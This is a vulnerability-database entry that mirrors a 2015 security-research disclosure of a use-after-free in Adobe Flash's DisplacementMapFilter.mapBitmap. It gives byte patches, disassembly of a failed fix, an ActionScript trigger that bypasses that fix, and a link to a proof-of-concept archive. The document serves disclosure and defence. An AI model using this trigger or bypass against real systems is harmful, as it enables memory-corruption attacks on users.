Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Adobe Flash AS2 - DisplacementMapFilter.mapBitmap Use-After-Free (2)

🗓️ 19 Aug 2015 00:00:00Reported by bilouType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 21 Views

Adobe Flash AS2 Use-After-Free in DisplacementMapFilter.mapBitma

Code
Source: https://code.google.com/p/google-security-research/issues/detail?id=377&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

[Deadline tracking for https://code.google.com/p/chromium/issues/detail?id=487237]

Credit is to bilou, working with the Chromium Vulnerability Reward Program

---
There is a use after free in Flash caused by an improper handling of BitmapData objects in the DisplacementMapFilter.mapBitmap property. 
This is almost a repost of  Issue 457680  due to a patch failure.

VERSION
Chrome Version: N/A now, Flash StandAlone Debug 17.0.0.188
Operating System: [Win7 x64 SP1]

REPRODUCTION CASE
The AS2 mapBitmap_v2_as2.fla can be compiled with Flash CS5. Some bytes must be changed manually to trigger the issue (see below).
Just put mapBitmap_v2_as2.swf in a browsable directory and run the swf with Chrome. It might crash while dereferencing 0x41424344 (hopefully, not tested yet because not available).

After compiling mapBitmap_v2_as2.swf, I had to change the bytes at offset 0x92B in the (MyBitmapData constructor):
52 17 96 02 00 04 03 26 to 17 17 17 17 17 17 17 17 (actionPOP)

The description is exactly the same as in  Issue 457680  so I won't repost it. Here are just my comments on the patch.
They basically added a marker at offset +0xDC in the flash standalone debugger (the standalone player is not available at the time of writing):

.text:005AD629 loc_5AD629:
.text:005AD629                 lea     ecx, [esi+0DCh]
.text:005AD62F                 push    edi
.text:005AD630                 mov     [ebp+1C4h+var_198], ecx
.text:005AD633                 call    xsetUseMarker

.text:0059F762                 cmp     byte ptr [ecx], 0   ; is the marker present?
.text:0059F765                 jz      short loc_59F77B
.text:0059F767                 cmp     [esp+arg_0], 0      ; is 0 provided?
.text:0059F76C                 jz      short locret_59F77E 
.text:0059F76E                 mov     ecx, dword_EE4788   ; kill the program
.text:0059F774                 call    sub_9798C0
.text:0059F779                 jmp     short locret_59F77E
.text:0059F77B
.text:0059F77B loc_59F77B:
.text:0059F77B                 mov     byte ptr [ecx], 1   ; else set the marker
.text:0059F77E
.text:0059F77E locret_59F77E:
.text:0059F77E                 retn    4


That marker is then removed when we exit the BitmapData dispatcher:

.text:005AEF29                 mov     eax, [ebp+1C4h+var_198] ; jumptable 005AD654 default case
.text:005AEF2C                 mov     byte ptr [eax], 0


So, to trigger again the issue, we just have to put an extra call to getPixel32 for example:

var o = new Object()
o.valueOf = function () {
    bd.getPixel32(1,4)          // remove the marker :)
	f()
	for (var i = 0; i<0x10;i++) {
		var tf:TextFormat = new TextFormat()
		tf.tabStops = b
		a[i] = tf
	}
	return 4
}

bd.getPixel32(o,4)


And we're done :)
---

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37861.zip

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Aug 2015 00:00Current
7.4High risk
Vulners AI Score7.4
adobe flashas2use-after-freedisplacementmapfilterbitmapdatachromevulnerability
21